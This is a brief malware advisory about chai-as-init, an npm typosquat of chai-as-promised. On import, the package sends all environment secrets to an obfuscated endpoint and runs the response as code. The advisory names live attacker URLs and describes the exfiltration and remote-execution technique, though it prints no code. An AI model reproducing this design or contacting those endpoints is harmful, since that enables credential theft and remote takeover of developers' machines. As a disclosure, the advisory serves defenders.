chai-as-init is a malicious npm package that when imported downloads a C2 dropper from https://api.npoint[.]io/c2e881b8bc0fe2121454 and executes it (similar to malware in to chai-await-test).

---

-= Per source details. Do not edit below this line.=-

chai-as-init is a typosquat impersonating chai-as-promised, with a README copy-pasted from pino. The exported middleware spawns a detached background process running lib/initializeCaller.js, which posts the full process.env object (including AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI and other secrets) to a base64-obfuscated endpoint that decodes to https://ipcheck-hashed.vercel.app/api/auth/b4dadd6a26d820d085963. The HTTP response body is then passed to new Function("require", response.data) and invoked with the local require, allowing the operator of that endpoint to execute arbitrary Node.js code in the victim process with full module access. The package's claimed logging/chai purpose is unrelated to the code that actually runs.